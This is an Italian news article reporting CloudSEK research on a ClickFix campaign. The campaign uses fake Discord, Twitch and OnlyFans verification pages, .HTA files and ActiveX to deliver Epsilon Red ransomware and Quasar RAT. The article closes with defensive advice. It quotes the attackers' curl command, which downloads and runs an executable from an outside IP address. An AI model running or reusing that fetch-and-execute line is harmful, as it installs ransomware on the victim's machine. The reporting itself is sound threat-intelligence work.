OnlyFans e le pagine a tema ClickFix di Discord diffondono il ransomware Epsilon Red

Una nuova e sofisticata campagna ransomware sta ingannando attivamente gli utenti di Internet in tutto il mondo, utilizzando false pagine di verifica per diffondere una pericolosa minaccia chiamata malware Epsilon Red.

Questa scoperta critica è rivelata nell'ultimo rapporto di intelligence sulle minacce di CloudSEK, un'azienda leader nella sicurezza informatica. La campagna in corso, individuata per la prima volta a luglio 2025, utilizza tecniche di ingegneria sociale in cui gli aggressori si spacciano per servizi online popolari come Discord , Twitch e OnlyFans . Inducono gli utenti a scaricare file .HTA dannosi, ovvero speciali applicazioni HTML in grado di eseguire script direttamente su un computer.

Secondo CloudSec, quando una vittima accede a una delle false pagine di verifica a tema ClickFix e interagisce con essa, vengono eseguiti in background comandi dannosi a sua insaputa.

Ciò avviene tramite l'abuso di ActiveX , una tecnologia che consente l'utilizzo di contenuti interattivi nei browser web. In questo attacco, lo script dannoso scarica ed esegue silenziosamente il ransomware Epsilon Red da una posizione nascosta, aggirando i normali controlli di sicurezza.

L'analisi di CloudSEK condivisa con Hackread.com ha rivelato i comandi curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe , che scaricano ed eseguono il ransomware senza che l'utente visualizzi la tipica finestra di download.

Viene quindi visualizzato un falso messaggio di verifica, inducendo l'utente a credere che tutto sia normale. In particolare, nel falso messaggio è presente un piccolo errore di battitura, "Verificatification", che potrebbe essere un dettaglio intenzionale per apparire meno sospetto.

Il team TRIAD di CloudSEK, responsabile di questa scoperta, ha osservato che, a differenza delle vecchie versioni di attacchi simili che si limitavano a copiare comandi dannosi negli appunti, questa nuova variante rimanda le vittime a una seconda pagina in cui l'infezione avviene senza alcun chiaro preavviso.

L'infrastruttura a supporto di questa campagna include diversi domini e indirizzi IP falsi, progettati per apparire come servizi legittimi, tra cui un finto bot Captcha di Discord. Sono state trovate anche alcune pagine di incontri o siti di escamotage a tema romantico. Inoltre, un altro malware, un Quasar RAT , è stato collegato a questa campagna, indicando il potenziale per il controllo remoto insieme al ransomware.

Il ransomware Epsilon Red, apparso per la prima volta nel 2021, lascia richieste di riscatto che assomigliano un po' a quelle del noto ransomware REvil , sebbene i due siano per il resto distinti nel loro funzionamento. Questo evidenzia una tendenza in cui diversi gruppi di ransomware potrebbero prendere in prestito elementi l'uno dall'altro.

Per proteggersi da questa nuova minaccia, CloudSEK raccomanda diversi passaggi chiave. Gli utenti dovrebbero disabilitare ActiveX e Windows Script Host (WSH) tramite le impostazioni del proprio computer per bloccare questo tipo di esecuzione di script. Le organizzazioni dovrebbero inoltre utilizzare feed di threat intelligence per bloccare immediatamente indirizzi IP e domini di aggressori noti, come twtichcc e 155.94.155227:2269 .

Inoltre, gli strumenti di sicurezza degli endpoint dovrebbero essere configurati per rilevare attività nascoste insolite, come programmi eseguiti in modalità silenziosa dai browser web. Infine, è fondamentale una formazione continua sulla sicurezza informatica, che insegni agli utenti a riconoscere ed evitare pagine di verifica false e tentativi di ingegneria sociale , anche se impersonano piattaforme online familiari.